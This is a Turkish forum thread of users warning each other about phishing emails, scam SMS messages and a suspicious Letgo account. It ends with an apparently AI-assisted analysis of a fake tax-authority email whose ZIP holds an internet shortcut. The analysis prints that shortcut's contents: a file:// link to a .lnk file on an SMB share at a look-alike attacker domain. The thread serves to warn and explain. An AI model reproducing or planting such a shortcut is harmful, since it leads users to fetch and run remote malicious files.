Merhaba;
Lütfen dikkat edin, #Pishing yöntemi olarak bunu türetmişler galiba. Kurumsal bir firmaya bunu göndermiş, firmanın İstanbul ile herhangi bir bağlantısı bulunmuyor. Hem Windows dosya'da virüs buldu, hem de ChatGPT ile sorgulayınca yönlendirmeli bağlantılar saptandı, buradan da dikkat etmeniz için ufak bir hatırlatma olsun.
Not: İçeriğinden ve geliş saatinden şüphelendik, e-mail servisi de direkt bunu spam'a taşımış.
#SpamMail #dolandırıcılık
+49 ile başlayan numaralardan link içeren smsler gelmeye başlamış, 1 saat öcne birsürü kişiye gitmiş
xxxxxx numaralı siparişiniz ulaştı, en kısa zamanda teslim edilecek. Detaylar için tıklayın
gibi şeyler yazıyor
yine bir şeylerin peşindeler herhalde
#sms #scam #spamsms #spamsms #spam #SpamNumaralar #spambildirim #spamseyir #phishingscam #Pishing
Geçen hafta bana da geldi AppleID çalınmak üzere tasarlanmış bi siteye yönlendirdi. Apple’a phishing olduğunu detaylıca anlatıp bildirdim. 3-5 kuruş ateşlemediler ama 😛
Özellikle TürkNet kullanıcılarını ilgilendiren fakat diğerlerine de uyarı olarak şöyle bir tweet gördüm. Oltalama SMS'i atıyorlarmış. Dikkat edin bilgilerinizi çaldırmayın.
#turknet #oltalama #Pishing #istenmeyenSMS #hedeflioltalama
https://twitter.com/furkanacikgoz/status/1443469510451810304?s=21
Altındaki yorumlarda bizim diyor Türknet. Whois bilgilerinde de domain sunucusu turk.net
https://twitter.com/TurkNetDestek/status/1443473929591574529
Hic kullanmam etmem, birisi Letgo'da emailimi kullanarak hesap acmis, ayrica bir de dogrulama yapmis.
Simdi bu kisi benim emailime erismis ise Google'da gorunmuyor ama onaylandi diye ayrica mail geldi.
Letgo.nl hic bir sekilde ulasilamiyor...
Hic bir sosyal agda kayitli olmayan emailime bu alcaklar nasil ulastilar?
Ulastilarsa Google niye bana bunu belirtmedi, yapan kisiler Hollanda'dan mi?
Hic bir tuhaf aktivite yada baska adres yok, Proxy'ye bile izin vermezken ben bunlar dogrulamayi nasil yaptilar?
Ben hic bir dogrulama yapmadim...
Pishing desem degil, adresler Letgo'ya yonlendiriyor...
Ama Letgo Hollanda sayfasi acilamadigi icin kontrol edemiyorum...
Bu nasil bir hastaliktir?
Tesaduf mu bilmem Letgo ile de iletisime gecemiyorum...
Benzer bir durum yasayan var mi?
Geriye bir ihtimal kaliyor, nur topu gibi bir Trojan var 🙁
#Letgo #Sahtekarlik #Pishing
Letgo ile iletisime gectim, gercekten bir hesap olmus ve sildiler.
Yahu, her seyi yaptim, denedim, yok yani hic bir izinsiz kullanim yok adresimi.
Google'dan kontrol yaptim, zaten supheli bir durumda Hollanda bile olsa onaylamadigim surece email erisimine izin vermiyor.
2 ihtimal var
1- Bilgisayarda virus var ( Bu cok dusuk hatta yok denilecek bir ihtimal )
2- Telefondan bazen kullaniyordum.
1. ihtimal pek mumkun olmadigina gore Mobil kaliyor...
Opera ile bazen giris yapiyordum ki gorusune gore acik sayesinde emailime erisebilmisler, haliyle sifremi degistirdim.
Bazen emaili arkaplanda acik unutabiliyorum Opera'da, sanirim bundan faydalandilar...
Ama...
Emailimin acik olacagini nerden bildiler, nasil tesadufen o anda onaylandi...
Email 22:01'de gelmis, Opera'daki son erisim ise 20:08...
Yani, saat farkina bakarsak Turkiye'nin ic bolgelerinde bir yerlerden, Ankara civarlarindan yada Eskisehir'den denenmis olabilir.
Ayni anda benim emailimin acik oldugunu bu kisiler nasil ogrendi, ogrenmedilerse VPN kullandilarsa IP araligini nasil tutturdular ki Google cok dikkatlidir yani Hollanda bile olsa baska semtten girersem bu sizmisiniz onaylayin diyor...
Opera'da her seyi kendi sunucusundan geçirip veriyi azaltma yöntemi vardı (Chrome'da da var gerçi), onunla alakalı bir sorun da olabilir.
Letgo tarafinda, dogrulama surecinde bir acik suistimal edilmis olabilir. Sizin eposta hesabiniza erismeden ya da bilgisayariniz kullanilmadan, eposta onayi atlatilmistir.
Bu da bir ihtimal, Letgo US ile iletisime gectigimde boyle bir hesap yok demediler yani hesap var ve aktive edilmis ama engellediler.
Bildirdigim icin de tesekkur ettiler 😀
Yani, halen tam cozemedigim bir durum...
Acaba tanıdığınız birinin cihazına o maille oturum açmış olma ihtimaliniz var mı? Belki aynı cihazda letggo indirip direk Google ile giriş yapımıştır. VPN kullandığı için de Hollanda gözükebilir. Bence bu varsayımı bir değerlendirin.
Benim gittigim konumlar haric baska bir yer gorunmuyor, buyuk ihtimal ile bir sekilde ya Opera'dan verilere eristi yada Letgo'da @dirigeant'in dedigi gibi bir acik var.
@ameledervis Bence mail sunucusunu heklemişler ve tüm insanların kullanıcı adı (mail adresi ve parolası) bilgilerini ele geçirmişler.
Gönderici adresi resmi duruyor ?
1️⃣ ZIP Dosyası İçeriği:
ZIP dosyası içerisinde sadece bulut-sorusturma-06-05-2025-id-ist9930234.url adında bir URL dosyası bulundu.
2️⃣ URL Dosyası İçeriği:
URL dosyasının içeriği şu şekildeydi:
ini
Kopyala
Düzenle
[InternetShortcut]
URL=file://cloud.gib.sorusturma-reconnect.6b6vg5migs.govtrd.store/smbpaylasim/dmca.lnk
InternetShortcut: Bu, bir bağlantı kısayoludur. Tıklandığında doğrudan belirtilen adrese gider.
3️⃣ Alan Adı Analizi:
cloud.gib.sorusturma-reconnect.6b6vg5migs.govtrd.store
.gov.tr yerine .govtrd.store kullanılmış.
Türkiye'deki resmi devlet siteleri her zaman .gov.tr uzantısına sahiptir.
.store uzantısı, sahte bir domain olduğunun güçlü bir göstergesidir.
4️⃣ Protokol Kullanımı:
URL, file:// protokolü ile başlıyor.
file://, yerel ağda veya cihazda dosya çalıştırmaya olanak sağlar.
Bu tip protokol kullanımı, kötü amaçlı dosyaları uzaktan çalıştırmak veya ağ üzerinde virüs yaymak için kullanılır.
5️⃣ SMB Paylaşımı (Server Message Block):
URL'nin devamında /smbpaylasim/dmca.lnk ifadesi var.
smbpaylasim: SMB (Server Message Block) dosya paylaşımı protokolü.
Kötü niyetli yazılımlar genellikle SMB protokolünü kullanarak ağdaki diğer cihazlara bulaşır.
Bu yapı, sisteme yetkisiz erişim sağlamak amacıyla oluşturulmuş olabilir.
6️⃣ Güvenlik Kontrolleri:
Alan adı sorgulaması yapıldığında, bu domainin resmi bir GİB sayfası olmadığı tespit edildi.
Yönlendirmeler tamamen sahte bir alan adına yapılmış.
7️⃣ E-Posta Güvenliği:
GİB (Gelir İdaresi Başkanlığı) genelde e-posta yoluyla ZIP dosyası göndermez.
E-posta başlığı ve içerik yapısı sahte ve profesyonelce hazırlanmış.
SPF, DKIM, ve DMARC güvenlik kontrollerinden geçememiş.
@atokyuz bunu nerde yaptın böyle bir site mi var? Dosyaları attığın maileri böyle analiz eden ?
@arthapot yapay zeka
@atokyuz tşk dosyayı mı yükledin direk zip ı hangisinde bu imkan var ?
Konu başlığı hatalı, gönderim zamanı hatalı, yazımı hatalı, imzası hatalı. Bir tek gönderen adresini güzel maskelemişler, ama onun da adı hatalı. Dosyanın ekte olduğu ve ektekinin ne olduğunu düzgün bir şekilde belirtilmemiş. Dolandırıcı puanım 2/10
buna düşek mükellef sayısı 9/10
Maksat zip dosyasını açtırmak demekki
Çok sade, çok profesyonel
çok iyiyimiş peki bu maili nasıl oluşturmuşlar?